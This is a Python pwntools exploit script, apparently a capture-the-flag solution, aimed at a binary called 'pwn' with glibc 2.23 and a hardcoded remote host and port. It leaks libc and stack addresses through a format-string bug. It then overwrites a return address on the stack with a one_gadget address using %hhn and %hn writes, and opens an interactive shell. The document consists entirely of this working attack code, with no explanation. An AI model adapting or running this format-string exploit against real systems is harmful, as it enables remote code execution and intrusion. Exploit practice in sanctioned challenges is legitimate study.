1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86
|
from pwn import * import os r = lambda x : io.recv(x) ra = lambda : io.recvall() rl = lambda : io.recvline(keepends = True) ru = lambda x : io.recvuntil(x, drop = True) s = lambda x : io.send(x) sl = lambda x : io.sendline(x) sa = lambda x, y : io.sendafter(x, y) sla = lambda x, y : io.sendlineafter(x, y) ia = lambda : io.interactive() c = lambda : io.close() li = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
context.log_level='debug' context.terminal = ['tmux', 'splitw', '-h']
elf_path = 'pwn' libc_path = '/glibc/2.23/64/lib/libc.so.6' libc_path = './libc-2.23.so'
host = "118.190.62.234:33445"
LOCAL = 0 LIBC = 1
def db(): if(LOCAL): gdb.attach(io) def unique(s): return ''.join(set(s))
def exploit(): li('exploit...') sla('word:', '%19$p') sla(':', '%19$p') ru('0x') libc_base = int(io.recv(12), 16) - libc.sym['_IO_2_1_stdout_'] li('libc_base: ' + hex(libc_base)) one_gadget = libc_base + 0xf1247 sla('word:', '%24$p') sla(':', '%24$p') ru('0x') stack = int(io.recv(12), 16) + 8 offset = 12 print('stack address: ' + hex(stack)) s = '%' + str(one_gadget & 0xff) + 'c%' + str(offset + 2) + '$hhn' p = s.encode() p += b'\x00' * 5 + p64(stack) sla('word:', p) sla(':', unique(s))
s = '%' + str((one_gadget >> 8) & 0xFFFF) + 'c%' + str(offset + 2) + '$hn' p = s.encode() p += b'\x00' * 3 + p64(stack + 1) sla('word:', p) sla(':', unique(s)) def finish(): ia() c()
if __name__ == '__main__': if LOCAL: elf = ELF(elf_path) if LIBC: libc = ELF(libc_path) io = elf.process() else: elf = ELF(elf_path) io = remote(host.split(':')[0], int(host.split(':')[1])) if LIBC: libc = ELF(libc_path) exploit() finish()
|